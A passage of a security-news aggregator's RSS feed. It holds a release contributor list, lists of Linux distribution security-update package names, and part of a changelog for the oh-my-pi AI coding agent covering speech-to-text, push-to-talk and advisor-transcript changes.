class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JimStenstrom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JimStenstrom">@JimStenstrom</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmsunseri/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmsunseri">@jmsunseri</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joel611/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joel611">@joel611</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoelJJohnson/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoelJJohnson">@JoelJJohnson</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerj123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerj123">@joerj123</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/johnjacobkenny/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/johnjacobkenny">@johnjacobkenny</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jooray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jooray">@jooray</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshuadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshuadow">@joshuadow</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jplew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jplew">@jplew</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justinbao19/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justinbao19">@justinbao19</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Justlrnal4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Justlrnal4">@Justlrnal4</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kailigithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kailigithub">@Kailigithub</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kamonspecial/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kamonspecial">@kamonspecial</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kdunn926/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kdunn926">@kdunn926</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenmege/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenmege">@Kenmege</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kewe63/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kewe63">@Kewe63</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kmccammon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kmccammon">@kmccammon</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konsisumer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konsisumer">@konsisumer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kristianvast/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kristianvast">@kristianvast</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kyssta-exe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kyssta-exe">@kyssta-exe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/l37525778-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/l37525778-coder">@l37525778-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LaPhilosophie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LaPhilosophie">@LaPhilosophie</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leo4226/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leo4226">@leo4226</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liuhao1024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liuhao1024">@liuhao1024</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Llugaes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Llugaes">@Llugaes</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LoongZhao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LoongZhao">@LoongZhao</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lsaether/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lsaether">@lsaether</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m4dni5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m4dni5">@m4dni5</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/manishbyatroy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/manishbyatroy">@manishbyatroy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MaxFreedomPollard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MaxFreedomPollard">@MaxFreedomPollard</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxmilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxmilian">@maxmilian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxtrigify/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxtrigify">@maxtrigify</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mnajafian-nv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mnajafian-nv">@mnajafian-nv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohamedorigami-jpg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohamedorigami-jpg">@mohamedorigami-jpg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mollusk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mollusk">@mollusk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrDiamondBallz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrDiamondBallz">@MrDiamondBallz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mssteuer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mssteuer">@mssteuer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mvanhorn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mvanhorn">@mvanhorn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/naqerl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/naqerl">@naqerl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nea74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nea74">@Nea74</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/necoweb3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/necoweb3">@necoweb3</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nepenth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nepenth">@nepenth</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nicoloboschi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nicoloboschi">@nicoloboschi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NormallyGaussian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NormallyGaussian">@NormallyGaussian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OmarB97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OmarB97">@OmarB97</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omegazheng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omegazheng">@omegazheng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OndrejDrapalik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OndrejDrapalik">@OndrejDrapalik</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oxngon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oxngon">@oxngon</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OYLFLMH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OYLFLMH">@OYLFLMH</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paperclip/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paperclip">@paperclip</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paulb26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paulb26">@paulb26</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pengyuyanITYU/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pengyuyanITYU">@pengyuyanITYU</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PhilipAD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PhilipAD">@PhilipAD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pinguarmy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pinguarmy">@pinguarmy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/plcunha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/plcunha">@plcunha</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProgramCaiCai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProgramCaiCai">@ProgramCaiCai</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/psionic73/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/psionic73">@psionic73</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qin-ctx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qin-ctx">@qin-ctx</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qingshan89/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qingshan89">@qingshan89</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Que0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Que0x">@Que0x</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qWaitCrypto/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qWaitCrypto">@qWaitCrypto</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r266-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r266-tech">@r266-tech</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/randomsnowflake/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/randomsnowflake">@randomsnowflake</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rbrtbn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rbrtbn">@rbrtbn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rewbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rewbs">@rewbs</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rio-jeong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rio-jeong">@rio-jeong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Rivuza/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Rivuza">@Rivuza</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rodboev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rodboev">@rodboev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ruangraung/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ruangraung">@ruangraung</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyTsYdUp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyTsYdUp">@RyTsYdUp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sahil-SS9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sahil-SS9">@Sahil-SS9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/salesondemandio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/salesondemandio">@salesondemandio</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanidhyasin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanidhyasin">@sanidhyasin</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sarvesh1327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sarvesh1327">@sarvesh1327</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sdyckjq-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sdyckjq-lab">@sdyckjq-lab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @simpolism, @sitkarev, @skyc1e, @skylarbpayne, @SNooZyy2,<br>
@Spaceman-Spiffy, @srojk34, @sweetcornna, @synapsesx, @Tamaz-sujashvili, @tangtaizong666, @temalo, @tfournet,<br>
@thedavidweng, @TheGardenGallery, @tim404x, @tomekpanek, @Tranquil-Flow, @tt-a1i, @tuancookiez-hub,<br>
@underthestars-zhy, @Veritas-7, @victor-kyriazakos, @wesleysimplicio, @WolframRavenwolf, @WompaJango, @x1erra,<br>
@xiaoxinova, @xtymac, @xushibo, @XVVH, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxchan">@xxchan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a>, @xy200303, @y0shua1ee, @yanxue06, @yatesjalex,<br>
@YLChen-007, @yoniebans, @youjunxiaji, @yubingz, @zakame, @zapabob, @zccyman, @zimigit2020, @ziwon, @zwcf5200,<br>
@zxcasongs.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.6.5...v2026.6.19">v2026.6.5...v2026.6.19</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (dracut, podman, postfix, rsync, xorg-x11-server, and xorg-x11-server-Xwayland), Debian (atril, firefox-esr, and nginx), Mageia (libcap, perl, and python-pillow), Oracle (firefox, gstreamer-plugins-base and gstreamer-plugins-good, httpd:2.4, kernel, ...]]></description>
<link>https://tsecurity.de/de/3607926/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607926/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 18 Jun 2026 15:25:57 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (dracut, podman, postfix, rsync, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Debian</b> (atril, firefox-esr, and nginx), <b>Mageia</b> (libcap, perl, and python-pillow), <b>Oracle</b> (firefox, gstreamer-plugins-base and gstreamer-plugins-good, httpd:2.4, kernel, libpng12, libpng15, libxml2, libxslt, opencryptoki, openssl, postfix, rsync, webkit2gtk3, xorg-x11-server, and xorg-x11-server-Xwayland), <b>Slackware</b> (bind, libidn, mozilla, and openssl), <b>SUSE</b> (alloy, docker, elemental-system-agent, glibc, grafana, helm, LibVNCServer, openssh8.4, perl-GD, perl-HTTP-Daemon, python-WebOb-doc, python311-google-adk, rustup, traefik2, wireshark, and xwayland), and <b>Ubuntu</b> (dolibarr, golang-go.crypto, graphite2, gst-plugins-bad1.0, kitty, libconfig-inifiles-perl, libnginx-mod-js, and webpy).]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Probleme in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3606140/it-security-nachrichten/zwei-probleme-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606140/it-security-nachrichten/zwei-probleme-in-rsync-red-hat/</guid>
<pubDate>Wed, 17 Jun 2026 23:22:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security: Zwei Probleme in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3606081/unix-server/security-zwei-probleme-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606081/unix-server/security-zwei-probleme-in-rsync-red-hat/</guid>
<pubDate>Wed, 17 Jun 2026 23:01:30 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (hplip, kernel, kernel-rt, libpng12, libpng15, libxml2, libxslt, mysql:8.0, mysql:8.4, opencryptoki, openssl, postfix, postgresql:15, rsync, and webkit2gtk3), Debian (asterisk, atril, gsasl, and libreoffice), Fedora (ack, bird, chromium, firefox, ldn...]]></description>
<link>https://tsecurity.de/de/3604986/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604986/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 17 Jun 2026 15:39:54 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (hplip, kernel, kernel-rt, libpng12, libpng15, libxml2, libxslt, mysql:8.0, mysql:8.4, opencryptoki, openssl, postfix, postgresql:15, rsync, and webkit2gtk3), <b>Debian</b> (asterisk, atril, gsasl, and libreoffice), <b>Fedora</b> (ack, bird, chromium, firefox, ldns, librabbitmq, nextcloud, nss, openslide, perl-Protocol-HTTP2, tig, vorbis-tools, and xen), <b>Mageia</b> (coturn, log4cxx, and python-tornado), <b>SUSE</b> (389-ds, buildah, container-suseconnect, distribution, editorconfig-core-c, elemental-system-agent, glib-networking, google-guest-agent, google-osconfig-agent, kernel, libcaca, libXpm, opensc, openssl-3, openvswitch, perl-Crypt-PBKDF2, python-python-dotenv, python311-aiosmtplib, python311-zeroconf, runc, shim, and sqlite3), and <b>Ubuntu</b> (ca-certificates, keystone, librabbitmq, linux, linux-aws, linux-kvm, linux-aws-hwe, linux-azure, linux-gcp, linux-hwe, linux-oracle, linux-azure, linux-azure, linux-gcp, linux-hwe, linux-oracle, linux-azure-6.8, linux-oracle-5.15, nova, openimageio, qemu, and squid).]]></content:encoded>
</item>
<item>
<title><![CDATA[v16.0.3]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Added

Exported renderDelimitedThinking from the @oh-my-pi/pi-ai/dialect barrel so consumers can reuse the dialect's  envelope unwrap-and-rewrap logic (the only ./dialect/rendering primitive re-exported; the rest stay dialect-internal).

Fixed

Fixed OpenAI Responses/Codex tool sc...]]></description>
<link>https://tsecurity.de/de/3603377/tools/v1603/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603377/tools/v1603/</guid>
<pubDate>Wed, 17 Jun 2026 02:23:16 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Exported <code>renderDelimitedThinking</code> from the <code>@oh-my-pi/pi-ai/dialect</code> barrel so consumers can reuse the dialect's <code>&lt;thinking&gt;</code> envelope unwrap-and-rewrap logic (the only <code>./dialect/rendering</code> primitive re-exported; the rest stay dialect-internal).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed OpenAI Responses/Codex tool schema normalization stripping provider-rejected regex lookaround patterns from MCP tool parameter schemas. (<a href="https://github.com/can1357/oh-my-pi/issues/2784" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2784/hovercard">#2784</a>)</li>
<li>Fixed OpenAI Responses parallel tool-call routing so late keyed argument deltas for a closed call are dropped instead of being appended to another open call.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added support for LaTeX color commands (<code>\textcolor</code>, <code>\colorbox</code>, and <code>\fcolorbox</code>) in user-visible terminal prose and final chat to colorize output</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed STT dependency setup to validate recorder and model assets per <code>stt.modelName</code>, so switching speech models re-runs dependency checks and downloads for the new model</li>
<li>Changed STT startup with cached models to warm the speech model in the background and defer full model loading until transcription begins, reducing push-to-talk start latency</li>
<li>Allowed user-visible terminal and final-chat responses to include LaTeX math delimiters/commands and Mermaid <code>```mermaid</code> diagrams</li>
<li>Changed the hold-<code>Space</code> push-to-talk gesture to recognize a held bar from the <em>regularity</em> of the OS key auto-repeat rather than a raw space count or speed alone, so it no longer spams the editor, no longer eats deliberate space taps, and no longer triggers when the bar is smashed. Recording starts only after two consecutive inter-space deltas are "mechanical" — both fast (within ~120 ms) and near-identical, the metronomic signature of auto-repeat; the few pre-burst spaces typed are then tracked back out. Smashing (fast but jittery) and deliberate spacing (steady but slow) both keep typing real spaces and never start recording.</li>
<li>Updated markdown Mermaid rendering to color ASCII diagrams with the active theme and automatically choose a narrower layout that better fits the terminal width</li>
<li>Made the watched-session transcript sent to the advisor (and shown by <code>/advisor dump</code>) clearer: each turn now opens with a <code>### Session update</code> heading; watched-agent roles render as inline <code>**agent**:</code> / <code>**user**:</code> labels instead of level-2 headings that collided with the advisor's own turns; consecutive same-role messages collapse under one label (the watched agent emits one assistant message per tool call); and batched updates are joined by a blank line rather than a <code>---</code> rule.</li>
<li>Changed the compact transcript tool-intent prefix (<code>history://</code>, <code>/advisor dump</code>) from <code># </code> to <code>// </code> so intent lines read as comments instead of rendering as Markdown H1 headings.</li>
<li>Changed the advisor advice injected into the primary transcript from a <code>Advisor (...): - [severity] note</code> prose block to one <code>&lt;advisory severity="…" guidance="weigh, don't blindly obey"&gt;…&lt;/advisory&gt;</code> element per note, with XML-escaped bodies. (Relocated the shared <code>escapeXmlText</code> helper to <code>@oh-my-pi/pi-utils</code>.)</li>
<li>Reverted <code>/dump</code> and <code>/advisor dump raw</code> to the pre-16.x full verbose dump: system prompt, model/thinking config, tool inventory with parameters, and the message transcript rendered with markdown role headings (<code>## User</code>, <code>## Assistant</code>, <code>### Tool Call: &lt;name&gt;</code> with the call's <code>_i</code> intent as a <code>//</code> comment under the heading and the remaining arguments as a fenced YAML block, <code>### Tool Result: &lt;name&gt;</code>, plus <code>## Bash Execution</code>/<code>## File Mention</code>/summary sections) instead of the model's native-dialect turn envelopes and <code>&lt;invoke&gt;</code>/<code>&lt;parameter&gt;</code> XML tool calls. Dropped the compact default and the <code>[raw]</code> flag on <code>/dump</code>; the compact <code>→ tool(...) ⇒ ok</code> history format is no longer reachable from <code>/dump</code>. <code>/advisor dump</code> still defaults to compact, and <code>/advisor dump raw</code> now renders the same markdown dump (previously the model's native-dialect envelopes).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Whisper STT cache detection to require both encoder and decoder <code>.onnx</code> files, so partial model downloads now trigger a proper foreground download instead of being treated as fully cached</li>
<li>Fixed same-process <code>JsRuntime</code> cleanup so disposing an older inline/direct runtime no longer deletes a newer runtime's JS helper globals; inactive cmux/direct runtimes now re-activate their globals before sequential use while overlapping cross-runtime runs fail explicitly.</li>
<li>Fixed magic-keyword steering notices (<code>ultrathink-notice</code>, <code>orchestrate-notice</code>, <code>workflow-notice</code>) to be prepended before the related user message so they influence that same turn</li>
<li>Fixed dequeuing or popping queued user messages to remove their preceding hidden magic-keyword notice companions, preventing orphaned queued notices</li>
<li>Fixed queued user steers to auto-resume after interrupts even when the transcript tail is a preserved advisor card or other non-conversational custom message</li>
<li>Fixed queued user follow-up messages to remain queued after an interrupt and only run on explicit resume, even when an IRC wake leaves a provider-valid tail</li>
<li>Fixed stranded IRC asides to wake a response turn after interruption instead of remaining pending</li>
<li>Fixed accepted IRC asides to be flushed into the transcript during disposal instead of being discarded</li>
<li>Fixed interactive submissions made while the TUI had no active input waiter: they now start a real prompt directly, with steer fallback if a background turn races in, instead of queueing behind a non-resumable idle transcript and appearing to do nothing.</li>
